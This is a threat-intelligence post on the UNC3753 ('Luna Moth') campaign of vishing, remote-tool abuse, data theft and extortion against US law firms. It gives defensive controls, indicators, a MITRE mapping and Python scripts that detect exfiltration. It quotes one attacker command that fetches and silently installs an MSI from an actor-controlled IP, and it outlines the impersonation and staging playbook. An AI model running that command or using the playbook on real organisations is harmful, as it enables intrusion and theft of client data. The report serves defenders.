[TIMESTAMP: 2026-06-05 16:59 UTC] [AUTHOR: Runtime Rebel Intel] [SEVERITY: CRITICAL]

UNC3753 Targets US Law Firms with Vishing & Physical Intrusions

AI-Assisted Analysis
// executive briefing tl;dr
  • [01] Immediate impact: UNC3753 targets US law, professional, and financial firms with rapid data theft and extortion.
  • [02] Affected systems: Any endpoint or VDI accessible to employees, including BYOD, is vulnerable.
  • [03] Remediation: Implement robust out-of-band identity verification for all remote and physical access.

Overview: UNC3753’s Evolving Data Theft and Extortion Campaign

From January through May 2026, the threat cluster UNC3753, also tracked as “Luna Moth,” “Chatty Spider,” and “Silent Ransom Group,” executed a sophisticated, financially motivated data theft and extortion campaign targeting dozens of organizations across the professional, legal, and financial services sectors in the United States. This campaign demonstrates a rapid operational tempo, with many incidents progressing from initial contact to data theft and extortion within a single business day. Notably, the group has escalated its tactics to include physical office intrusions, as detailed on the Google Cloud Blog.

UNC3753 primarily leverages voice phishing (vishing) and social engineering techniques to gain unauthorized remote access. Under the guise of IT support or data migration projects, actors manipulate targets into screen-sharing sessions and installing legitimate Remote Monitoring and Management (RMM) utilities. Once inside, they either directly exfiltrate sensitive data, such as proprietary legal agreements, Personally Identifiable Information (PII), and financial records, or coerce victims into doing so, culminating in aggressive extortion demands.

Threat Actor Profile: UNC3753 (Luna Moth)

UNC3753 is a financially motivated threat cluster active since at least March 2022. While previously observed deploying ransomware such as LOCKBIT.BLACK in 2022, the group has shifted its focus to data theft and extortion-only operations, often threatening to publish stolen data on the LEAKEDDATA data leak site (DLS). The group has TTP overlaps with UNC2686, known for “Bazarcall” style campaigns. Initially, UNC3753 relied on subscription-themed email lures, but around March 2025 it transitioned to impersonating internal corporate IT helpdesk staff, signaling an adaptation to bypass traditional security controls more effectively.

UNC3753 Attack Lifecycle and TTPs

The campaign’s effectiveness stems from its optimized, fast-tempo operational model, often completing the attack sequence in less than 24 hours. Google Threat Intelligence Group (GTIG) has observed data searches, staging, and theft initiated in under an hour during recent incidents.

Initial Access: Vishing and Social Engineering

UNC3753 initiates campaigns with benign, invoice-themed email lures, devoid of malicious links or attachments. These emails serve as a pretext to increase target susceptibility to follow-up voice calls. The core of their entry relies on targeted vishing, contacting personnel across all seniority levels, often found via publicly listed organizational websites. Actors impersonate internal IT helpdesk or security teams, guiding targets to join screen-sharing sessions under false pretenses like security issues or corporate data migration projects.

Remote Access and Legitimate Tool Abuse

Threat actors bypass automated boundary security by instructing users to download and execute legitimate screen-sharing applications and RMM agents. Common tools observed include Zoom, Microsoft Terminal Services, Microsoft Teams, Quick Assist, AnyDesk, Bomgar, and Zoho Assist. In one incident, actors attempted to install a “SuperOps RMM agent” via a cURL command: curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet. Actors frequently use privnote[.]com to deliver installation links and commands, ensuring no permanent digital footprint.

Infrastructure Pivoting and Data Staging

Intrusions often exploit Bring Your Own Device (BYOD) remote environments to access internal enterprise assets. UNC3753 has established Zoom sessions on personal BYOD endpoints, then used these to access corporate Virtual Desktop Infrastructure (VDI) via native clients like Windows 365 or Citrix. Once VDI access is secured, they pivot to corporate file systems, performing:

  • System Enumeration: Mapping local directories, OneDrive folders, and network drives.
  • Document Management Targeted Harvesting: Focusing on legal and document storage repositories like iManage.
  • Keyword Search and File Staging: Using keywords (e.g., tax logs, W-2, W-9, 1099, audit files, client agreements, SSNs) to locate highly sensitive data, which is then compiled in user-accessible subdirectories, typically the Downloads folder or Roaming profile path.

Data Exfiltration Techniques

To exfiltrate staged data and bypass security controls, UNC3753 employs various methods:

  • Cloud Storage Staging: Direct manipulation of victims’ screens or instructions for victims to drag-and-drop folders into actor-controlled consumer file-sharing accounts, sometimes branded to mimic the victim organization.
  • FTP Utilities: When browser-based uploads are restricted, actors download FTP/SFTP clients like WinSCP or Rclone. For instance, 1.7 GB was exfiltrated from OneDrive to Google Drive, followed by 14.4 GB via WinSCP from a VDI session.
  • Email Forwarding: Victims are instructed to stage files from internal repositories (e.g., iManage) and send them to actor-controlled consumer email addresses from their corporate mailboxes.

Extortion Tactics

Extortion communications are delivered unbranded via email shortly after data theft, often within 30 minutes. These aggressive letters impose a three-day deadline for negotiations, threatening to contact employees, external clients, and publish data on the LEAKEDDATA DLS (e.g., hxxps[:]//business-data-leaks[.]com). The actors emphasize potential regulatory fines, reputational damage, and client lawsuits to pressure victims.

Physical Office Intrusions by Silent Ransom Group

In a significant escalation, GTIG assesses that actors possibly linked to UNC3753 have attempted direct data theft via physical, in-person access. An FBI Cyber FLASH Alert (260526.pdf) corroborates this, detailing instances where individuals posing as IT technicians entered corporate offices to exfiltrate data directly from endpoints using USB storage media. This tactic is deployed if remote social engineering fails, demonstrating the group’s adaptability and willingness to leverage non-digital vectors to bypass robust technical perimeters.

Defensive Strategies: Mitigating UNC3753 Data Theft

Organizations must adopt a comprehensive security posture to counter UNC3753’s blend of social engineering, legitimate tool abuse, and physical intrusions. Defending against such multifaceted attacks requires a combination of technical controls, strong policies, and continuous user awareness.

User Education

Conduct regular and targeted user awareness training specifically tailored to UNC3753’s TTPs. Emphasize the risks of vishing, the impersonation of IT staff, and the dangers of installing unauthorized software or sharing screens. Educate employees on proper verification procedures for any unexpected requests.

Physical Access and Verification Policies

Implement rigid out-of-band identity verification for all external contractors, technical staff, and facilities visitors. Mandate the following:

  • Require official credentials and photo identification for all visitors.
  • Front-desk staff must copy and log all physical visitor IDs.
  • Verify the arrival of technicians against pre-scheduled work orders directly with the parent organization or helpdesk dispatcher.
  • Enforce a policy requiring physical technical service personnel to be escorted by a corporate supervisor at all times.

Remote Access Conditional Access Controls

Implement conditional access policies for remote access, ensuring only corporate-owned devices can authenticate to VDI or VPN. This provides increased organizational control and visibility, especially for BYOD systems utilizing VDI entry. Employing Zero Trust principles can strengthen these controls.

Enforce Strict RMM and Screen-Sharing Software Controls

Audit corporate environments to block the installation and execution of unauthorized remote monitoring, management, and support utilities. Enforce application control policies (e.g., Windows Defender Application Control or third-party EDR tools) to restrict the execution of non-approved binaries. Consider restricting interactive screen-control features within authorized virtual meeting platforms like Zoom and Microsoft Teams.

Endpoint Removable Media Hardening

To neutralize physical exfiltration vectors, disable read/write capabilities for all external USB mass storage devices. Enforce Group Policy Objects (GPOs) or Mobile Device Management (MDM) configurations to restrict:

  • USB storage device installation.
  • Removable media access.
  • Optical media writes on all corporate endpoints and BYOD systems utilizing VDI entry.

Network Monitoring and Egress Control

Monitor firewall logs, network flows, and endpoint execution logs for indicative exfiltration and staging actions. Specifically:

  • Block or alert on outbound connections to unauthorized file-sharing APIs and email services.
  • Ensure full session logging with bytes transferred is enabled within Firewall log configurations.
  • Monitor SSH traffic (port 22) from internal VDIs and endpoints for high-volume transfers; WinSCP and Rclone sessions over SSH are a common exfiltration channel.
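The egress checks in the list above, as an added example (not code from the report or from GTIG): it reads constructed firewall session records that include bytes transferred, reports any session to a watch-listed consumer file-sharing host, and totals SSH bytes leaving an assumed VDI subnet for external destinations, so that several medium-sized WinSCP or Rclone sessions still trip a threshold. The VDI subnet, watchlist and threshold are assumptions to be tuned to the environment.

```python
import ipaddress
from collections import defaultdict

# Constructed firewall session records for illustration (not from the report).
# Fields: end_time,src_ip,dst_ip,dst_port,bytes_out,dst_host (host may be empty)
SESSION_LOG = """\
2026-05-12T14:02:11Z,10.20.5.17,203.0.113.40,22,120000000,
2026-05-12T14:09:48Z,10.20.5.17,203.0.113.40,22,480000000,
2026-05-12T14:15:03Z,10.20.5.17,203.0.113.40,22,350000000,
2026-05-12T14:20:30Z,10.20.5.22,10.20.9.8,22,900000000,
2026-05-12T14:31:12Z,10.20.5.31,203.0.113.77,443,1800000000,drive.google.com
2026-05-12T14:40:00Z,10.20.5.40,198.51.100.9,443,2048,
"""

VDI_SUBNETS = [ipaddress.ip_network("10.20.5.0/24")]   # assumed VDI address pool
INTERNAL = [ipaddress.ip_network("10.0.0.0/8")]         # assumed internal ranges
SSH_EGRESS_THRESHOLD = 500 * 1024 * 1024                # 500 MiB per source; tune to baseline
# Consumer file-sharing services to alert on (assumed watchlist; extend per policy)
FILE_SHARING_WATCHLIST = {"drive.google.com", "share.example-consumer.net"}

def in_any(ip, networks):
    return any(ip in net for net in networks)

def watched_host(host):
    return any(host == w or host.endswith("." + w) for w in FILE_SHARING_WATCHLIST)

def analyze(log_text):
    """Return (finding, src_ip, dst_host, bytes) tuples for suspicious egress."""
    ssh_bytes = defaultdict(int)   # SSH bytes out per VDI source to external hosts
    findings = []
    for line in log_text.strip().splitlines():
        ts, src, dst, port, nbytes, host = line.split(",")
        src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
        # Any session to a consumer file-sharing service is reported immediately.
        if host and watched_host(host):
            findings.append(("file-sharing-egress", src, host, int(nbytes)))
        # SSH leaving the VDI pool for a non-internal destination is accumulated
        # per source, so several medium WinSCP/Rclone sessions still add up.
        if port == "22" and in_any(src_ip, VDI_SUBNETS) and not in_any(dst_ip, INTERNAL):
            ssh_bytes[src] += int(nbytes)
    for src, total in ssh_bytes.items():
        if total >= SSH_EGRESS_THRESHOLD:
            findings.append(("bulk-ssh-egress", src, None, total))
    return findings

if __name__ == "__main__":
    for finding in analyze(SESSION_LOG):
        print(finding)
```

The internal-to-internal SSH session (10.20.5.22 to 10.20.9.8) is deliberately ignored; restrict the INTERNAL list further if lateral SSH between VDIs should also be reviewed.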

Application Log and Access Auditing

Review authentication and access metrics for critical document stores to identify bulk harvesting profiles. Configure real-time alerts in iManage, SharePoint, and corporate email directories for rapid file searches, search-term spikes, and mass file downloads. Implement multi-factor authentication (MFA) on business-critical data repository applications, such as iManage, and require MFA step-up queries when accessing VDI nodes.
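A detection pass over document-store audit events, as an added example that is not part of the original article: it flags a user whose searches spike inside a ten-minute window, who downloads files in bulk, or whose search terms match several of the staging keywords the report lists. The log format, user names and thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed document-store audit events (not from the report), one per line:
# timestamp,user,action,detail where detail is a search term or a file path.
_LINES = [
    "2026-05-12T14:01:10Z,jdoe,search,W-2",
    "2026-05-12T14:01:25Z,jdoe,search,1099",
    "2026-05-12T14:01:40Z,jdoe,search,SSN",
    "2026-05-12T14:01:55Z,jdoe,search,client agreements",
    "2026-05-12T14:02:10Z,jdoe,search,audit files",
    "2026-05-12T14:12:00Z,asmith,download,/Clients/Beta/lease.docx",
]
# Twelve downloads by jdoe between 14:03:00 and 14:04:50, ten seconds apart.
_LINES += [f"2026-05-12T14:{3 + i // 6:02d}:{(i % 6) * 10:02d}Z,jdoe,download,/Tax/batch_{i}.zip"
           for i in range(12)]
AUDIT_LOG = "\n".join(_LINES)

# Staging keywords named in the report, matched case-insensitively in search terms.
SENSITIVE_TERMS = ("w-2", "w-9", "1099", "ssn", "tax", "audit", "client agreement")
WINDOW = timedelta(minutes=10)
SEARCH_SPIKE, MASS_DOWNLOAD, SENSITIVE_HITS = 5, 10, 3   # per WINDOW; tune to baseline

def parse(log_text):
    for line in log_text.strip().splitlines():
        ts, user, action, detail = line.split(",", 3)
        yield datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), user, action, detail

def peak_in_window(times, window):
    # Sliding window over sorted timestamps: most events inside any window-long span.
    times, best, lo = sorted(times), 0, 0
    for hi, t in enumerate(times):
        while t - times[lo] > window:
            lo += 1
        best = max(best, hi - lo + 1)
    return best

def audit(log_text):
    # Map each user to the bulk-harvesting indicators they tripped.
    per_user = defaultdict(lambda: {"search": [], "download": [], "sensitive": set()})
    for ts, user, action, detail in parse(log_text):
        per_user[user].setdefault(action, []).append(ts)
        if action == "search":
            per_user[user]["sensitive"].update(t for t in SENSITIVE_TERMS if t in detail.lower())
    alerts = {}
    for user, d in per_user.items():
        reasons = [name for name, hit in (
            ("search-spike", peak_in_window(d["search"], WINDOW) >= SEARCH_SPIKE),
            ("mass-download", peak_in_window(d["download"], WINDOW) >= MASS_DOWNLOAD),
            ("sensitive-terms", len(d["sensitive"]) >= SENSITIVE_HITS)) if hit]
        if reasons:
            alerts[user] = reasons
    return alerts
```

Running audit(AUDIT_LOG) returns only jdoe, with all three indicators; asmith's single download stays below every threshold.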

Outlook and Implications

The targeting of US legal and professional services organizations by financially motivated actors like UNC3753 remains a persistent and high-risk threat. These firms are high-value targets due to their concentrated repositories of highly sensitive client data, including transaction files, merger plans, trade secrets, and regulatory reports. Threat groups exploit the significant reputational and regulatory exposure of legal entities, leveraging it to motivate quiet and rapid resolution of extortion demands.

UNC3753’s reliance on voice-guided social engineering to bypass robust technical perimeters, web security gateways, and even MFA configurations underscores the enduring challenge posed by attacks targeting the human element. The integration of in-person, physical office intrusions by Silent Ransom Group represents a significant escalation in threat capability. While log-based defenses and endpoint telemetry have matured, physical corporate boundaries are frequently protected only by administrative procedures. Organizations must transition to a unified security posture that treats physical facility access control and endpoint-based hardware policies as equally critical components of their defensive perimeter. This unified approach is key to mitigating UNC3753 data theft and protecting sensitive assets.

Indicators of Compromise (IoCs)

GTIG has identified the following IoCs associated with UNC3753 activity. A comprehensive collection is available in a GTI Collection for registered users.

Data Leak Site (DLS)

  • hxxps[:]//business-data-leaks[.]com

Phishing Domains

  • <organization>-itdesk[.]com
  • <organization>-it[.]com
  • <organization>-helpdesk[.]com


MITRE ATT&CK Mapping

The MITRE ATT&CK framework provides a common language for describing UNC3753’s TTPs:

Tactic               Technique ID   Technique Name
Initial Access       T1566.004      Phishing: Spearphishing Voice
                     T1133          External Remote Services
Execution            T1204.002      User Execution: Malicious File
                     T1059.001      Command and Scripting Interpreter: PowerShell
                     T1059.003      Command and Scripting Interpreter: Windows Command Shell
                     T1569.002      System Services: Service Execution
Persistence          T1053.005      Scheduled Task/Job: Scheduled Task
                     T1547.001      Boot or Logon Autostart Execution: Registry Run Keys
Defense Evasion      T1036.005      Masquerading: Match Legitimate Name or Location
                     T1553.002      Subvert Trust Controls: Code Signing
                     T1562.001      Impair Defenses: Disable or Modify Tools
                     T1070.001      Indicator Removal: Clear Windows Event Logs
Credential Access    T1003.001      OS Credential Dumping: LSASS Memory
                     T1003.002      OS Credential Dumping: Security Account Manager
Discovery            T1083          File and Directory Discovery
                     T1135          Network Share Discovery
                     T1046          Network Service Discovery
Lateral Movement     T1219          Remote Access Software
                     T1021.001      Remote Services: Remote Desktop Protocol
                     T1021.004      Remote Services: SSH
Collection           T1005          Data from Local System
Command & Control    T1572          Protocol Tunneling
Exfiltration         T1020          Automated Exfiltration
                     T1567.002      Exfiltration Over Web Service: Exfiltration to Cloud Storage
                     T1052.001      Exfiltration Over Physical Medium
Impact               T1486          Data Encrypted for Impact
